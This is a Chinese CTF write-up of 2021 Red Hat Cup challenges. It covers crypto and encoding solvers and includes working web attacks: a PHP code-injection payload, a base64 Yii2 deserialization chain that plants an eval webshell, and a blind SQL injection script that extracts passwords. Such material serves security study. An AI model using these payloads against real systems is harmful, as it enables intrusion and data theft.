2021年第四届红帽杯部分解题记录,草稿里存了半年没发。
find-it
`code` 参数的值被直接拼接进要执行的 PHP 代码中,可注入任意代码;payload 末尾的 `//` 把拼接在后面的原有代码注释掉:
code=?code=<?php%20phpinfo();//
读取hack.php的内容,找到flag。
flag{bac134ff-5265-4fa4-b333-66a84983225f}
primegame
import math
from decimal import *
import random
from sympy import Matrix
import struct
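# 100 significant digits: ln(p) * 16**64 is a ~78-digit number, so the
# default Decimal precision (28) would truncate the basis values.
getcontext().prec = int(100)

# Trial-division sieve of the primes below 100 (25 primes) — the "public key".
primes = [2]
for i in range(3, 100):
    is_prime = True
    for j in primes:
        # A composite i has a factor <= sqrt(i), so stop once j*j exceeds i.
        # (The original compared i*i < j, which never triggers in this range;
        # it silently fell back to full trial division — same primes, more work.)
        if j * j > i:
            break
        if i % j == 0:
            is_prime = False
            break
    if is_prime:
        primes.append(i)

# keys[i] = ln(primes[i]) as a high-precision Decimal; arr[i] is the same value
# scaled by 16**64 and truncated to an int (the integer lattice basis used later).
keys = [Decimal(int(p)).ln() for p in primes]
SCALE = int(16) ** int(64)
arr = [int(v * SCALE) for v in keys]

# Challenge ciphertext: sum(m_i * ln(p_i)) scaled by 16**64 and truncated.
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453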
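def encrypt(res, ln_keys=None):
    """Return the challenge "ciphertext" for the integer vector ``res``.

    Computes ``sum(res[i] * ln_keys[i])`` over every key with Decimal arithmetic
    (precision comes from the current decimal context), scales the sum by
    16**64 and truncates to an int — the same encoding as the challenge ``ct``.

    Args:
        res: sequence of integer message values; must have at least one entry
            per key (extra entries are ignored, as in the original loop).
        ln_keys: optional sequence of Decimal logarithms. Defaults to the
            module-level ``keys`` (ln of the primes below 100).

    Returns:
        int: the scaled, truncated weighted sum.

    Raises:
        IndexError: if ``res`` is shorter than the key list.
    """
    ks = keys if ln_keys is None else ln_keys
    h = Decimal(0)
    for i in range(len(ks)):
        h += res[i] * ks[i]
    return int(h * int(16) ** int(64))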
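def f(N):
    """Try to recover the message bytes by LLL on a scaled-down knapsack.

    Builds the (ln+1) x (ln+1) integer lattice

        [ I_ln      | arr[i] // N ]
        [ 64 ... 64 |   ct // N   ]

    whose short vector is (m_0 - 64, ..., m_{ln-1} - 64, *) when the message
    bytes m_i are printable ASCII (0 <= m_i < 128). Dividing by ``N`` trades
    precision for a smaller basis, which is why the caller sweeps many N.
    Every reduced row whose first ``ln`` entries lie in [-64, 64) is shifted
    back to bytes and re-encrypted; a match is printed as ``N <bytes>``, a
    mismatch as ``NO <ct'> <bytes>``.

    Uses the module-level ``arr``, ``ct`` and ``encrypt``, plus ``Matrix(ZZ, ...)``
    and ``.LLL()``, which are SageMath APIs. NOTE(review): the
    ``from sympy import Matrix`` at the top of the script shadows Sage's
    ``Matrix`` — this was presumably run under Sage without that import; confirm.

    Args:
        N: positive integer divisor applied to the basis column and to ``ct``.
    """
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N
        A[ln, i] = 64
    A[ln, ln] = ct // N
    res = A.LLL()
    for i in range(ln + 1):
        vals = [int(res[i][j]) for j in range(ln)]
        if not all(-64 <= v < 64 for v in vals):
            continue
        # LLL may return the short vector negated; try both orientations before
        # reporting a miss (the original only tried +1 and printed NO for the
        # mirrored vector, which otherwise passes the range filter).
        for sign in (1, -1):
            vec = [sign * v + 64 for v in vals]
            if encrypt(vec) == ct:
                print(N, bytes(vec))
                break
        else:
            vec = [v + 64 for v in vals]
            print("NO", encrypt(vec), bytes(vec))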
# Sweep the scaling divisor; f() prints every N that yields a consistent message.
for divisor in range(2, 10000):
    print(divisor)
    f(divisor)
脚本依赖 Sage 的 `Matrix(ZZ, …)`/`.LLL()`,需在 SageMath 下运行;把 ct 分别替换为题目给出的两个 out 值各跑一次,将恢复出的两段明文拼接即得 flag。
flag{715c39c3-1b46-4c23-8006-27b43eba2446}
framework
下载 www.zip 得到源码,用 D 盾扫描发现后门文件;框架为 Yii2,`message` 参数的值(base64 编码的序列化对象)会被反序列化,利用 `yii\db\BatchQueryResult → yii\web\DbSession → yii\caching\ExpressionDependency` 这条 gadget 链可以执行任意 PHP 代码。
构造如下 payload(反序列化后通过 file_put_contents 写入 webshell):
http://eci-2zeebn8ci69dyqxvw06w.cloudeci1.ichunqiu.com//index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjEwNzoiZmlsZV9wdXRfY29udGVudHMoJy92YXIvd3d3L2h0bWwvd2ViL2Fzc2V0cy95LnBocCcsJzw/cGhwIEBldmFsKCRfUkVRVUVTVFtlZWVdKTtzaG93X3NvdXJjZShfX0ZJTEVfXyk7Pz4nKTsiO31pOjE7czoxODoiZXZhbHVhdGVEZXBlbmRlbmN5Ijt9fX0K
访问后在 web/assets/y.php 生成一句话木马(密码即 payload 中的 `eee`),用蚁剑连接;目标限制了命令执行函数,需借助 bypass disable functions 插件拿到 shell 后读取 flag。
flag{a7a179b8-9765-433c-9752-efd5a4b3be52}
hpcurve
import itertools
import struct
# hpcurve, part 1: recover the keystream bytes covered by the known plaintext
# and decrypt with them. Sage syntax throughout: `R.<x>` declares a polynomial
# ring, `^` is exponentiation and `^^` is XOR.
# Challenge curve: genus-3 hyperelliptic curve y^2 = x^7 + x over GF(p), and
# its Jacobian.
p = 10000000000000001119
R.<x> = GF(p)[]; y=x
f = y + y^7
C = HyperellipticCurve(f, 0)
J = C.jacobian()
# Jacobian elements built as in the challenge; not used further in this script.
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
# Ciphertext (60 bytes): plaintext XOR keystream.
t = '66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5'
enc = bytes.fromhex(t)
# Known plaintext: 20 filler bytes followed by 'flag{' -> 25 bytes of keystream.
known_pt = 'a' * 20 + 'flag{'
known_pt = known_pt.encode()
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
# The keystream is consumed as little-endian 64-bit words; the first three are
# taken as the coefficients of a monic cubic u (the Mumford u-polynomial of a
# Jacobian element). The fourth block is a single byte and is not used.
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
# The roots of u may lie in an extension field, so work in the algebraic
# closure and interpolate v through (x_i, sqrt(f(x_i))).
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
# Each coefficient of v is only known up to sign (choice of square root), so
# both candidates are kept.
# NOTE(review): v.coefficients() returns only the non-zero coefficients, so
# indexing [0..2] assumes none of them vanish — confirm, or use v.list().
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]
for rs in itertools.product(*vi):
    # NOTE(review): q and rr are computed but never used — this loop is dead
    # code in this version; the v-coefficient candidates are only applied in
    # the follow-up script.
    q = struct.pack('<'+'Q'*len(rs), *rs)
    rr = rng_output+q
    #print(len(q))
    #flag = bytes(rr[k%24]^^enc[k] for k in range(len(rr)))# :, enc))
    #print(flag)
# Decrypt with the 24 recovered keystream bytes cycled with period 24. Only the
# positions whose keystream repeats those bytes decrypt correctly (the tail of
# the flag, per the writeup); the middle part needs the v coefficients too.
# (Indentation was lost in the paste: this block may originally have sat inside
# the loop above; the printed result is the same either way.)
# NOTE(review): `for x in enc` rebinds x, the polynomial variable — harmless
# because nothing after it uses x, but a trap if the script is extended.
tt = ''
i = 0
for x in enc:
    tt += chr((rng_output[i%24]^^x))
    i+=1
print(tt)
运行上面脚本(只用已知明文恢复出的 24 字节密钥流按周期 24 循环解密),得到 flag 的后半部分;中间一段要等下面的脚本恢复 v 多项式系数后才能解出。
import itertools
import struct
# hpcurve, part 2: same recovery as part 1, then decrypt with the full 48-byte
# keystream (u coefficients followed by v coefficients) for every sign choice
# of the v coefficients. Sage syntax: `R.<x>` declares a polynomial ring, `^`
# is exponentiation and `^^` is XOR.
p = 10000000000000001119
R.<x> = GF(p)[]; y=x
f = y + y^7
C = HyperellipticCurve(f, 0)
J = C.jacobian()
# Jacobian elements built as in the challenge; not used further in this script.
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
# Ciphertext (60 bytes): plaintext XOR keystream.
t = '66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5'
enc = bytes.fromhex(t)
# Known plaintext: 20 filler bytes followed by 'flag{' -> 25 bytes of keystream.
known_pt = 'a' * 20 + 'flag{'
known_pt = known_pt.encode()
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
# First three little-endian 64-bit words of the keystream are the coefficients
# of the monic cubic u (Mumford representation); the 1-byte fourth block is unused.
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
for _ in range(10):
    # NOTE(review): the bare `except: pass` below swallows every error
    # (including typos), so a silent failure just prints nothing; narrowing it
    # to the exception actually expected from the sqrt/interpolation step would
    # make that visible. The 10 attempts presumably re-run a randomised
    # sqrt/root choice in the closure — confirm.
    try:
        # Interpolate v through (x_i, sqrt(f(x_i))); each coefficient is only
        # known up to sign, so both candidates are kept.
        RR.<zz> = PolynomialRing(L)
        v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
        # NOTE(review): v.coefficients() returns only the non-zero coefficients;
        # indexing [0..2] assumes none vanish — confirm, or use v.list().
        vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
        vi = [(int(-c), int(c)) for c in vi]
        # print(vi)
        # One decryption per sign combination (8 lines); the keystream is
        # assumed to be u||v (48 bytes) repeated, hence keys[i % 48]. The
        # readable line is the right sign choice.
        for rs in itertools.product(*vi):
            keys = struct.pack('<'+'Q'*len(rs), *rs)
            leng = len(keys)
            keys = list(keys)
            enc = list(enc)
            flag = ""
            for i in range(len(enc)):
                flag += chr(keys[i%leng]^^enc[i])
            print(flag)
    except:
        pass
# flag = bytes(q[k%len(q)]^^enc[k] for k in range(len(enc)))# :, enc))
#print(flag)
运行后在各符号组合输出的若干行中找到可读的一行,即 flag 的前半部分;与上面得到的后半部分拼接:
flag{1b82f60a-43ab-4f18-8ccc-97d120aae6fc}
WebsiteManger
import requests as req
import string
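# Boolean-based blind SQL injection on image.php?id=1: the injected
# "&& exists(select 1 from users where password like '<prefix>%')" makes the
# page return the full image (> 200 bytes) only when the guessed prefix is right.
# "&&" is sent URL-encoded (%26%26) so it reaches the SQL query as part of `id`
# instead of being parsed as a query-string separator (the original script
# relied on rewriting it by hand in Burp).
url = ("http://eci-2zeir5o8p6vh5j4c0dvu.cloudeci1.ichunqiu.com/image.php?id=1"
       "%26%26exists(select/**/1/**/from/**/users/**/where/**/password/**/like/**/'")
r = "%')"
# Candidate alphabet. '%' and '_' are deliberately absent (LIKE wildcards).
# NOTE: MySQL LIKE is case-insensitive under the default collation, so letter
# case in the recovered value is not reliable — the password here is lowercase hex.
charset = string.ascii_letters + string.digits + "}{!@#"
prefix = ""
while True:
    for x in charset:
        payload = url + prefix + x + r
        print(payload)
        # Proxied through Burp to watch the traffic; optional.
        f = req.get(payload, proxies={"http": "127.0.0.1:8080"})
        print(f.text)
        if len(f.text) > 200:
            prefix += x
            break
    else:
        # No candidate extended the prefix: the value is complete, or it contains
        # a character outside charset. Stop instead of looping forever.
        break
print("password: " + prefix)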
脚本里的 `&&` 会被当作 URL 参数分隔符,需在 Burp 转发时(或直接在脚本中)把它替换为 `%26%26`;运行脚本通过布尔盲注逐字符得到密码 0df549b13756efae827f0,登录后获得 flag。
flag{de1a4ad3-856c-4aa9-afd1-5d57971543a3}
签到
附件是 EBCDIC 编码。Python 标准库其实已内置 cp037、cp273、cp500、cp1140 等 EBCDIC 代码页,直接用 cp037 解码即可;下面脚本用的是第三方库 ebcdic 提供的 cp1141(pip install ebcdic):
import ebcdic
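def decode_ebcdic(data, encoding="cp037"):
    """Decode EBCDIC bytes to text with a code page from the standard library.

    Python ships EBCDIC code pages natively (cp037, cp273, cp500, cp1140, ...),
    so the third-party ``ebcdic`` package is not required. The challenge file
    decodes cleanly with cp037 (US/Canada): bytes 0xC0/0xD0 are '{' and '}'
    there, whereas the German cp273/cp1141 code page maps them to 'ä'/'ü' —
    which is exactly the "flagäwe1c0me_...ü" output a cp1141 decode produces.

    Args:
        data: raw EBCDIC-encoded bytes.
        encoding: code page name; defaults to "cp037".

    Returns:
        str: the decoded text.

    Raises:
        UnicodeDecodeError: if ``data`` is not valid in ``encoding``.
    """
    return data.decode(encoding)


if __name__ == "__main__":
    with open('EBCDIC.txt', 'rb') as f:
        tmp = f.read()
    print(decode_ebcdic(tmp))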
输出内容为 flagäwe1c0me_t0_redhat2021ü。出现 ä/ü 是因为 cp1141 是德语代码页,字节 0xC0/0xD0 在其中是 ä/ü,而在 cp037 中正是 {/};改用 cp037 解码(或手动替换)即得 flag{we1c0me_t0_redhat2021}。